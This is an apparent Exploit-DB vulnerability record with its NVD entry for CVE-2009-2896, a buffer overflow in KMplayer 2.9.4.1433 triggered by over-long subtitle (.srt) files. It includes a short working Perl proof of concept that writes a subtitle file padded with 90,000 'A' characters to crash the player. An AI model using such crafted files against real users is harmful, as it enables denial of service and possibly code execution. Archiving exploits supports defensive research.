{"id": "EDB-ID:9220", "type": "exploitdb", "bulletinFamily": "exploit", "title": "KMplayer <= 2.9.4.1433 - .srt Local Buffer Overflow PoC", "description": "KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC. CVE-2009-2896. Dos exploit for windows platform", "published": "2009-07-20T00:00:00", "modified": "2009-07-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9220/", "reporter": "b3hz4d", "references": [], "cvelist": ["CVE-2009-2896"], "lastseen": "2016-02-01T10:07:45", "viewCount": 6, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-01T10:07:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2896"]}], "modified": "2016-02-01T10:07:45", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/9220/", "sourceData": "#!usr/bin/perl\n######################## In The Name Of Allah ####################\n#\n# The KMplayer (.Srt) File Local Bof Poc\n# \n#\n#Author : b3hz4d (Seyed Behzad Shaghasemi)\n#Site : Www.Pentesters.Ir\n#Tested on KMplayer <= 2.9.4.1433\n#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir\n#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers\n#\n######################### Www.Pentesters.Ir ######################\n\n\n\n$junk=\"A\"x 90000;\nopen(fhandle,\">SubTitle.srt\");\nprint fhandle \"1\".\"\\n\".\"00:00:25,100 --> 00:00:30,900\".\"\\n\".\"$junk\\n\".\"-pentesters\\n\";\nprint fhandle \"2\".\"\\n\".\"00:00:31,100 --> 00:00:35,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"3\".\"\\n\".\"00:00:36,100 --> 00:00:40,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"4\".\"\\n\".\"00:00:41,100 --> 00:00:45,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"5\".\"\\n\".\"00:00:46,100 --> 00:00:50,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"6\".\"\\n\".\"00:00:51,100 --> 00:00:55,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nclose(fhandle);\n\n# milw0rm.com [2009-07-20]\n", "osvdbidlist": ["57253"]}

{"cve": [{"lastseen": "2020-12-09T19:31:21", "description": "Buffer overflow in KMplayer 2.9.4.1433 and earlier allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long string in a subtitle (.srt) playlist file. NOTE: some of these details are obtained from third party information.", "edition": 5, "cvss3": {}, "published": "2009-08-20T17:30:00", "title": "CVE-2009-2896", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2896"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:kde:kmplayer:2.9.4.1433", "cpe:/a:kde:kmplayer:2.9.3.1210"], "id": "CVE-2009-2896", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:kde:kmplayer:2.9.4.1433:*:*:*:*:*:*:*", "cpe:2.3:a:kde:kmplayer:2.9.3.1210:*:*:*:*:*:*:*"]}]}